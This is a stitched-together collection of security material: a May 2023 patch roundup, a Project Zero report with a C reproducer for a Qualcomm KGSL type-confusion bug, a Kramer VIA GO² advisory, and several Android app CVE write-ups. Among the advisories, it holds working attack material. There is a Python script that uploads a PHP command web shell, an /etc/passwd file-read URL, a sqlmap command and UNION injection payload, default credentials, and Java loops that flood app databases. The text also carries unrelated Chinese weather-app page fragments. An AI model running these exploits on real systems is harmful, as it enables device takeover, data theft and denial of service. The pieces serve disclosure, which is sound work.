Plus: Microsoft patches two zero-day flaws, Google’s Android and Chrome get some much-needed updates, and more.

Apple, Google, and Microsoft have released major patches this month to fix multiple security flaws already being used in attacks. May was also a critical month for enterprise software, with GitLab, SAP, and Cisco releasing fixes for multiple bugs in their products.

Here’s everything you need to know about the security updates released in May.

Apple iOS and iPadOS 16.5

Apple has released its long-awaited point update iOS 16.5, addressing 39 issues, three of which are already being exploited in real-life attacks. The iOS upgrade patches vulnerabilities in the Kernel at the heart of the operating system and in WebKit, the engine that powers the Safari browser. The three already exploited flaws are among five fixed in WebKit—tracked as CVE-2023-32409, CVE-2023-28204, and CVE-2023-32373.

CVE-2023-32409 is an issue that could allow an attacker to break out of the Web Content sandbox remotely, reported by Clément Lecigne of Google's Threat Analysis Group and Donncha Ó Cearbhaill of Amnesty International’s Security Lab. CVE-2023-28204 is a flaw that risks a user disclosing sensitive information. Finally, CVE-2023-32373 is a use-after-free bug that could enable arbitrary code execution.

Earlier in the month, Apple released iOS 16.4.1 (a) and iPadOS 16.4.1 (a)—the iPhone maker’s first-ever Rapid Security Response update—fixing the latter two exploited WebKit vulnerabilities also patched in iOS 16.5.

Apple iOS and iPadOS 16.5 were issued alongside iOS 15.7.6 and iPadOS 15.7.6 for older iPhones, as well as iTunes 12.12.9 for Windows, Safari 16.5, macOS Big Sur 11.7.7, macOS Ventura 13.4, and macOS Monterey 12.6.6.

Apple also released its first security update for Beats and AirPods headphones.

Microsoft

Microsoft’s mid-month Patch Tuesday fixed 40 security issues, two of which were zero-day flaws already being used in attacks. The first zero-day vulnerability, CVE-2023-29336, is an elevation-of-privilege bug in the Win32k driver that could allow an attacker to gain System privileges.

The second serious flaw, CVE-2023-24932, is a Secure Boot security feature bypass issue that could allow a privileged attacker to execute code. “An attacker who successfully exploited this vulnerability could bypass Secure Boot,” Microsoft said, adding that the flaw is difficult to exploit: “Successful exploitation of this vulnerability requires an attacker to compromise admin credentials on the device.”

The security update is not a full fix: It addresses the vulnerability by updating the Windows Boot Manager, which could cause issues, the company warned. Additional steps are required at this time to mitigate the vulnerability, Microsoft said, pointing to steps affected users can take to mitigate the issue.

Google Android

Google has released its latest Android security patches, fixing 40 flaws, including an already exploited Kernel vulnerability. The updates also include fixes for issues in the Android Framework, System, Kernel, MediaTek, Unisoc, and Qualcomm components.

The most severe of these issues is a high-severity security vulnerability in the Framework component that could lead to local escalation of privilege, Google said, adding that user interaction is needed for exploitation.

Previously linked to commercial spyware vendors, CVE-2023-0266 is a Kernel issue that could lead to local escalation of privilege. User interaction is not needed for exploitation.

Apple's iOS 16.5 Fixes 3 Security Bugs Already Used in Attacks

Qualcomm Adreno/KGSL suffers from an unchecked cast of vma->vm_file->private_data in kgsl_setup_dmabuf_useraddr().

    Qualcomm Adreno/KGSL: unchecked cast of vma->vm_file->private_data in kgsl_setup_dmabuf_useraddr()[Tested on a Pixel 4 (flame), on the latest update from 2023-02, which self-reports as SPL 2022-10-05, since I don't yet have any newer device with KGSL here - but as far as I can tell from the sources, it should also affect current versions.]The following bug was apparently introduced in https://git.codelinaro.org/clo/la/kernel/msm-3.18/-/commit/7ada2c15e39e5288b67ed5ae94b0a8dcb181b911 as part of the fix for CVE-2022-25743.In drivers/gpu/msm/kgsl.c (on the msm/android-msm-redbull-4.19-android13-qpr1 branch of https://android.googlesource.com/kernel/msm), kgsl_setup_dmabuf_useraddr() (reachable via IOCTL_KGSL_MAP_USER_MEM with KGSL_USER_MEM_TYPE_ADDR) does the following: - look up a VMA by user-specified address (find_vma()) - check that the VMA is not anonymous (vma->vm_file) - check that the VMA does *NOT* belong to KGSL - cast the vma->vm_file->private_data to a "struct dma_buf" [bogus cast]This type-confused pointer is then passed down to kgsl_setup_dma_buf(), which passes it to dma_buf_attach(), which accesses fields through the type-confused pointer.Here's a simple reproducer that confuses "struct dma_buf" with "struct binder_proc" - build it like "aarch64-linux-gnu-gcc -static -o kgsl-vma-type-confusion kgsl-vma-type-confusion.c":#define _GNU_SOURCE#include <err.h>#include <fcntl.h>#include <stdlib.h>#include <sys/ioctl.h>#include <sys/mman.h>#define SYSCHK(x) ({          \  typeof(x) __res = (x);      \  if (__res == (typeof(x))-1) \    err(1, "SYSCHK(" #x ")"); \  __res;                      \})typedef unsigned long binder_size_t;typedef unsigned long binder_uintptr_t;enum binder_driver_command_protocol {  BC_INCREFS = _IOW('c', 4, unsigned int),};struct binder_write_read {binder_size_t write_size; /* bytes to write */binder_size_t write_consumed; /* bytes consumed by driver */binder_uintptr_t write_buffer;binder_size_t read_size; /* bytes to read */binder_size_t read_consumed; /* bytes consumed by driver */binder_uintptr_t read_buffer;};#define BINDER_WRITE_READ _IOWR('b', 1, struct binder_write_read)#define KGSL_IOC_TYPE 0x09enum kgsl_user_mem_type {KGSL_USER_MEM_TYPE_PMEM = 0x00000000,KGSL_USER_MEM_TYPE_ASHMEM = 0x00000001,KGSL_USER_MEM_TYPE_ADDR = 0x00000002,KGSL_USER_MEM_TYPE_ION = 0x00000003,KGSL_USER_MEM_TYPE_DMABUF       = 0x00000003,KGSL_USER_MEM_TYPE_MAX = 0x00000007,};#define KGSL_MEMFLAGS_GPUREADONLY 0x01000000Ustruct kgsl_map_user_mem {int fd;unsigned long gpuaddr;   /*output param */size_t len;size_t offset;unsigned long hostptr;   /*input param */enum kgsl_user_mem_type memtype;unsigned int flags;};#define IOCTL_KGSL_MAP_USER_MEM \_IOWR(KGSL_IOC_TYPE, 0x15, struct kgsl_map_user_mem)int main(void) {  /*   * set up binder a little bit so that its private data isn't full of null   * bytes   */  int binder_fd = SYSCHK(open("/dev/binder", O_RDWR));  unsigned int write_buffer[2] = {    BC_INCREFS, // cmd    0, // target  };  struct binder_write_read arg_bwr = {    .write_size = sizeof(write_buffer),    .write_buffer = (unsigned long)write_buffer  };  SYSCHK(ioctl(binder_fd, BINDER_WRITE_READ, &arg_bwr));  char *binder_vma = SYSCHK(mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, binder_fd, 0));  int kgsl_fd = SYSCHK(open("/dev/kgsl-3d0", O_RDWR));  struct kgsl_map_user_mem arg_mum = {    .len = 0x1001,    .offset = 0,    .hostptr = (unsigned long)binder_vma,    .memtype = KGSL_USER_MEM_TYPE_ADDR,    .flags = KGSL_MEMFLAGS_GPUREADONLY  };  SYSCHK(ioctl(kgsl_fd, IOCTL_KGSL_MAP_USER_MEM, &arg_mum));}When you run this on a Pixel 4, you'll get a splat like this:[   45.744676] Unexpected kernel BRK exception at EL1[   45.744689] Unhandled debug exception: ptrace BRK handler (0xf2005512) at 0xffffff95081fd358[   45.744695] Internal error: : 0 [#1] PREEMPT SMP[   45.744700] Modules linked in: ftm5(O) heatmap videobuf2_vmalloc videobuf2_memops lkdtm adsp_loader_dlkm stub_dlkm usf_dlkm native_dlkm machine_dlkm platform_dlkm wcd_cpe_dlkm wsa881x_dlkm wcd934x_dlkm wcd9360_dlkm mbhc_dlkm wcd9xxx_dlkm swr_ctrl_dlkm cs35l36_dlkm q6_dlkm swr_dlkm apr_dlkm q6_notifier_dlkm q6_pdr_dlkm wglink_dlkm wcd_spi_dlkm wcd_core_dlkm pinctrl_wcd_dlkm msm_11ad_proxy wlan(O) incrementalfs[   45.744735] Process kgsl-vma-type-c (pid: 7371, stack limit = 0x0000000017bcb360)[   45.744741] CPU: 6 PID: 7371 Comm: kgsl-vma-type-c Tainted: G S      W  O    4.14.276-g6ef255005cea-ab9062920 #1[   45.744744] Hardware name: Qualcomm Technologies, Inc. SM8150 V2 PM8150 Google Inc. MSM sm8150 Flame (DT)[   45.744748] task: 000000004f4f2973 task.stack: 0000000017bcb360[   45.744762] pc : osq_lock+0x17c/0x180[   45.744772] lr : __mutex_lock+0x134/0x7d8[   45.744776] sp : ffffff802681bab0 pstate : a0400145[   45.744779] x29: ffffff802681baf0 x28: ffffffdb21200da8[   45.744783] x27: ffffffdaa65e9800 x26: ffffffdaad722c00[   45.744786] x25: ffffff950aa8d000 x24: 000000000013a934[   45.744790] x23: ffffffdac40fda48 x22: ffffffdb6ac56c34[   45.744794] x21: 0000000000000002 x20: ffffffdb6ac56c28[   45.744797] x19: ffffffdac40fda00 x18: ffffffdab6d89458[   45.744801] x17: 0000000000000000 x16: ffffff9508095b90[   45.744805] x15: 0000000000000000 x14: 0000000000000070[   45.744809] x13: 0000000000000007 x12: 00000000ffffffda[   45.744812] x11: ffffff950a6a3028 x10: ffffff950a6aed80[   45.744816] x9 : ffffffdbffbb3d80 x8 : 0000000000000000[   45.744820] x7 : 0000000000000000 x6 : 000000000000003f[   45.744824] x5 : 0000000000000040 x4 : 0000000000000000[   45.744828] x3 : 0000000000000004 x2 : ffffffdac40fda00[   45.744831] x1 : 0000000000000002 x0 : ffffffdb6ac56c34[   45.744837] \x0aPC: osq_lock+0x13c/0x180:[   45.744840] d318  540001c0 f940012d b4fffead aa1f03ee f8ee812d d503201f d503201f d503201f[   45.744848] d338  d503201f b4fffdcd 2a1f03e0 f90005ac f900014d 17ffffdb 2a1f03e0 17ffffd9[   45.744855] d358  d42aa240 f800865e f81f0ffe d001252b d538d088 9100a16b b86b6908 aa1f03e2[   45.744862] d378  11000509 93407d21 aa0003e8 2a0103fe 88befc02 2a1e03e0 6b00013f 54000081[   45.744870] \x0aLR: __mutex_lock+0xf4/0x7d8:[   45.744874] 8b94  b9045a68 35000196 14000030 b9445a68 71000508 540000e1 52b00008 b9045a68[   45.744881] 8bb4  b9445e68 350031a8 b9045a7f 14000002 b9045a68 91003296 aa1603e0 97939183[   45.744888] 8bd4  36000440 f9400281 f27df028 540000c0 eb13011f 540001e1 361001c1 92400428[   45.744895] 8bf4  14000002 92400828 927ef908 aa1403e0 aa130102 aa0103fe c8fe7e82 aa1e03e0[   45.744905] \x0aSP: 0xffffff802681ba70:[   45.744908] ba70  081fd358 ffffff95 a0400145 00000000 00000000 00000000 d0608d00 c7188d35[   45.744916] ba90  ffffffff 0000007f 08c74984 ffffff95 2681baf0 ffffff80 081fd358 ffffff95[   45.744923] bab0  09d18bd4 ffffff95 0841e720 ffffff95 2681bb30 ffffff80 00000000 00000000[   45.744930] bad0  00000000 00000000 00000000 00000000 00000000 00000000 d0608d00 c7188d35[   45.744936][   45.744940] Call trace:[   45.744943] osq_lock+0x17c/0x180[   45.744947] __mutex_lock_slowpath+0x14/0x20[   45.744954] dma_buf_attach+0x78/0x1cc[   45.744960] kgsl_setup_dma_buf+0x5c/0x580[   45.744964] kgsl_setup_useraddr+0x118/0x89c[   45.744968] kgsl_ioctl_map_user_mem+0x210/0x73c[   45.744973] kgsl_ioctl_helper+0x13c/0x194[   45.744977] kgsl_ioctl+0x34/0xf0[   45.744982] do_vfs_ioctl+0x938/0xf3c[   45.744986] SyS_ioctl+0x138/0x16c[   45.744992] el0_svc_naked+0x34/0x38[   45.744997] Code: f900014d 17ffffdb 2a1f03e0 17ffffd9 (d42aa240)[   45.745002] ---[ end trace b07b8661a56776c3 ]---As you can see, dma_buf_attach() is trying to call mutex_lock(&dmabuf->lock) on the type-confused dmabuf pointer, which crashes the mutex implementation.This bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2023-05-09This is QPSIIR-1788."This is A-271879598.bulletin entry:https://source.android.com/docs/security/bulletin/2023-05-01#qualcomm-componentsfix commit:https://git.codelinaro.org/clo/la/kernel/msm-4.19/-/commit/86695e1dd101e71571998281541b0b4378f89414Related CVE Numbers: CVE-2022-25743,CVE-2023-21665.Found by: jannh@google.com

Qualcomm Adreno/KGSL Unchecked Cast / Type Confusion

Story Saver for Instragram - Video Downloader 1.0.6 for Android exists exposed component, the component provides the method to modify the SharedPreference file. The attacker can use the method to modify the data in any SharedPreference file, these data will be loaded into the memory when the application is opened. Depending on how the data is used, this can result in various attack consequences, such as ad display exceptions.

CVE-2023-29747

KramerAV VIA GO² < 4.0.1.1326 is vulnerable to Unauthenticated arbitrary file read.

**Introduction**

Kramer VIA GO² devices were vulnerable to multiple issues, including:

*   Unauthenticated arbitrary file read (CVE-2023-33507)
*   Unauthenticated SQLi (Squeely) (CVE-2023-33509)
*   Unauthenticated file upload resulting in RCE (CVE-2023-33508)

By chaining with previously discovered privilege escalation through misconfigured Sudo rules (CVE-2021-35064), it was possible to completely take over a device from an unauthenticated standpoint.

Throughout the disclosure process, Kramer have been exceedingly helpful and responsive. They were quick to confirm the issues and release a patch that fully resolves the issues.

**What is a Kramer VIA GO²?**

> VIA GO² gives iOS, Android, Chromebook, PC, and Mac users instant wireless connectivity with 4K advanced presentation capabilities. Kramer’s new VIA 4.0 is all about the end user. The new VIA application UI is intuitive, user-friendly and much easier to use. VIA 4.0 enables any user, including guests, to easily and securely connect and automatically disconnect at the end of the session.

After finding a device with default credentials (su:supass), it was discovered that it was possible to upload a font with an arbitrary extension and no content restrictions. This meant it was possible to upload a font which is actually a PHP script with the extension .php. Once the path on disk was found, visiting directly in a browser would execute the PHP file and allow a user to perform commands on the underlying operating system. From there, we created a dump of the available web application/PHP source code. The code was protected using IONCube, however this was bypassed using commonly available tools such as easytoyou.eu.

Available handlers were reviewed for issues and the three high severity vulnerabilities were discovered. It is likely that there are more within the codebase, and our audit of the code was in no way exhaustive.

After reviewing the latest firmware for these devices (4.0.1.1326), we noted that the handlers were _not_ included with the Debian package. The file runpkg.sh, which is run as part of the update process, contained the following commands:

    ...
    rm -rf /var/www/html/downloadRecording.php
    rm -rf /var/www/html/downloadMedia.php
    rm -rf /var/www/html/UploadWallpaper.php
    ...
    

This indicates that these endpoints should be removed by a firmware update.

While the firmware itself is password protected, simply by decoding the source code the decryption password was discovered.

**Proofs of concepts****Unauthenticated file read (CVE-2023-33507)**

The following endpoint allowed for the contents of arbitrary files on the file system to be retrieved:

*   http://XXX/downloadRecording.php?file=/etc/passwd

**Unauthenticated SQLi (CVE-2023-33509)**

This could be exploited with the following sqlmap command:

    sqlmap -u 'https://XXX/downloadMedia.php?medId=*' --dbms mysql --risk 3 --level 5 --technique B --threads 10
    

As an added bonus, the contents of arbitrary files could be obtained with the following payload:

*   https://XXX/downloadMedia.php?medId=-1+UNION+SELECT+"/../../../../etc/passwd"

**Unauthenticated RCE via File Upload (CVE-2023-33508)**

This issue can quickly be identified by attempting to access the endpoint:

*   http://XXX/UploadWallpaper.php

If this handler returns the message “Please enter the image to upload” it is very likely to be vulnerable.

The following Python payload can be used to obtain RCE:

    import requests
    import sys
    from urllib3.exceptions import InsecureRequestWarning
    
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    
    SHELL = '<html><head><title>babyshell</title></head><body><pre><?php echo $_REQUEST["cmd"]; ?></pre><br/><pre><?php echo system($_REQUEST["cmd"]); ?></pre></body></html>'
    
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target.com|1.2.3.4>")
        exit(1)
    
    target = sys.argv[1]
    
    url = f'https://{target}/UploadWallpaper.php'
    
    print("Uploading shell")
    
    resp = requests.post(url, files={'data': ('zx.php', SHELL)}, verify=False)
    
    if "Image added sucessfull" not in resp.text:
        print("Shell failed to upload")
        exit(1)
    
    print("Shell uploaded. Checking shell")
    
    url = f"https://{target}/uploads/large/zx.php"
    resp = requests.get(url, verify=False)
    if "Minishell" not in resp.text:
        print("Shell failed")
        exit(1)
    
    print("Shell available at:", url)
    

**Potential Impact**

Complete device compromise is possible, either via the RCE or obtaining user passwords via the Squeely.

**How to Fix It**

First update to version 4.0, then apply version 4.0.1.1326 or later.

**Vulnerability Disclosure Timeline:**

*   21/02/2023 Disclosed issue to CERT NZ
*   09/03/2023 Response from Vendor
*   17/03/2023 Vendor released patched firmware to ZX. ZX identified that the patch removes the vulnerable endpoints.
*   31/05/2023 CVEs assigned

CVE-2023-33507: Kramer VIA GO² - ZX Security

An issue found in BestWeather v.7.3.1 for Android allows unauthorized apps to cause an escalation of privileges attack by manipulating the database.

下载Android版 下载iOS版

下载Android版 下载iOS版

 

分钟级降水预报

穿衣提醒动画 出行提醒

 

360小时逐小时预报

未来90天预报 20多种生活指数

 

360小时逐小时预报

未来90天预报 20多种生活指数

移动互联网行业最具发展潜力奖

“双微一端”百佳评选—APP用户服务十佳账号

年度最佳天气类APP

“便捷生活”类绿色应用

中国互联协会会员

 

全场景覆盖 专业级天气服务

移动互联网行业最具发展潜力奖

“双微一端”百佳评选—APP用户服务十佳账号

年度最佳天气类APP

“便捷生活”类绿色应用

中国互联协会会员

 

应用名称：最美天气

开发者：最美天气（上海）科技有限公司

沪ICP备19025942号-2

权限详情 隐私政策

应用名称：最美天气

开发者：最美天气（上海）科技有限公司

沪ICP备19025942号-2

权限详情 隐私政策

CVE-2023-29741: 最美天气

An issue found in Alarm Clock for Heavy Sleepers v.5.3.2 for Android allows unauthorized apps to cause a denial of service attack by manipulating the database.

**Denial of Service exists in Alarm Clock for Heavy Sleepers（CVE-2023-29740）**

Vendor：Smart Alarm Clock Team(http://amdroidapp.com/)

Affected product：Alarm Clock for Heavy Sleepers(com.amdroidalarmclock.amdroid)

Version：5.3.2

Download link： https://play.google.com/store/apps/details?id=com.amdroidalarmclock.amdroid

Description of the vulnerability for use in the CVE：An issue found in Alarm Clock for Heavy Sleepers v.5.3.2 for Android allows unauthorized apps to cause a denial of service attack by manipulating the database.

poc：

private void attack() {
    while (true) {
        Intent intent = new Intent();
        ComponentName componentName = new ComponentName("com.amdroidalarmclock.amdroid", "com.amdroidalarmclock.amdroid.ApiCalls");
        intent.setComponent(componentName);
        intent.setAction("android.intent.action.SET\_ALARM");
        Random random = new Random();
        int legnth = random.nextInt(102400);
        String randomString =getRandomString(legnth);
        intent.setClassName("com.amdroidalarmclock.amdroid","com.amdroidalarmclock.amdroid.ApiCalls");
        intent.putExtra("android.intent.extra.alarm.HOUR",11);
        intent.putExtra("android.intent.extra.alarm.MINUTES",30);
        intent.putExtra("android.intent.extra.alarm.MESSAGE","this is hack's message!");
        ArrayList<Integer\> list\=new ArrayList<>();
        list.add(0);
        list.add(1);
        list.add(0);
        list.add(1);
        list.add(0);
        list.add(1);
        list.add(0);
        intent.putIntegerArrayListExtra("android.intent.extra.alarm.DAYS", list);
        intent.putExtra(randomString,randomString);
        try {
            System.out.println("发送数据");
            sendBroadcast(intent);
        } catch (Exception e) {
        }
    }
}

CVE-2023-29740: SO-CVEs/CVE detail.md at main · LianKee/SO-CVEs

An issue found in BestWeather v.7.3.1 for Android allows unauthorized apps to cause a persistent denial of service attack by manipulating the database.

**Denial of Service exists in Alarm Clock for BestWeather（CVE-2023-29743）**

Vendor：最美天气（上海）科技有限公司(http://www.zmtqsh.com/)

Affected product：BestWeather(com.icoolme.android.weather)

Version：7.3.1

Download link：https://play.google.com/store/apps/details?id=com.icoolme.android.weather

Description of the vulnerability for use in the CVE：An issue found in BestWeather v.7.3.1 for Android allows unauthorized apps to cause a persistent denial of service attack by manipulating the database.

poc：

private void attack() {
    while (true) {
        ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
				Uri uri = Uri.parse("content://com.icoolme.android.weather.provider/EXP");
				ContentValues contentValues = new ContentValues();
				contentValues.put("name",randomstring);
				contentResolver.insert(uri,contentValues);
    }
}

CVE-2023-29743: SO-CVEs/CVE detail.md at main · LianKee/SO-CVEs

The Call Blocker application 6.6.3 for Android allows attackers to tamper with feature-related data, resulting in a severe elevation of privilege attack.

**Escalation of Privileges exists in Call Blocker（CVE-2023-29728）**

Vendor：Fiorenza Francesco(https://www.call-blocker.info/)

Affected product：Call Blocker(com.cuiet.blockCalls)

Version：6.6.3

Download link： https://play.google.com/store/apps/details?id=com.cuiet.blockCalls

Description of the vulnerability for use in the CVE：The Call Blocker application 6.6.3 for Android allows attackers to tamper with feature-related data, resulting in a severe elevation of privilege attack.

poc：

public void attack(){
    ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
    while (true) {
        Uri uri = Uri.parse("content://com.cuiet.blockCalls.ContProvBlockCalls/tbBlackList");
        ContentValues contentValues = new ContentValues();
        contentValues.put("photo\_uri","123456789");
        contentValues.put("numeroContatto","987654321");
        contentResolver.update(uri,contentValues,null,null);
    }
}

CVE-2023-29728: SO-CVEs/CVE detail.md at main · LianKee/SO-CVEs

The Call Blocker application 6.6.3 for Android allows unauthorized applications to use exposed components to delete data stored in its database that is related to user privacy settings and affects the implementation of the normal functionality of the application. An attacker can use this to cause an escalation of privilege attack.

CVE-2023-29727

The Call Blocker application 6.6.3 for Android incorrectly opens a key component that an attacker can use to inject large amounts of dirty data into the application's database. When the application starts, it loads the data from the database into memory. Once the attacker injects too much data, the application triggers an OOM error and crashes, resulting in a persistent denial of service.

**Denial of Service exists in Call Blocker（CVE-2023-29726）**

Vendor：Fiorenza Francesco(https://www.call-blocker.info/)

Affected product：Call Blocker(com.cuiet.blockCalls)

Version：6.6.3

Download link： https://play.google.com/store/apps/details?id=com.cuiet.blockCalls

Description of the vulnerability for use in the CVE：The Call Blocker application 6.6.3 for Android incorrectly opens a key component that an attacker can use to inject large amounts of dirty data into the application's database. When the application starts, it loads the data from the database into memory. Once the attacker injects too much data, the application triggers an OOM error and crashes, resulting in a persistent denial of service.

poc：

public void attack(){
    ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
    while (true) {
        String randomString =getRandomString(5210);
        Uri uri = Uri.parse("content://com.cuiet.blockCalls.ContProvBlockCalls/tbBlackList");
        ContentValues contentValues = new ContentValues();
        contentValues.put("photo\_uri",randomString);
        contentValues.put("numeroContatto",randomString);
        contentResolver.insert(uri,contentValues);
    }
}

Tag

#android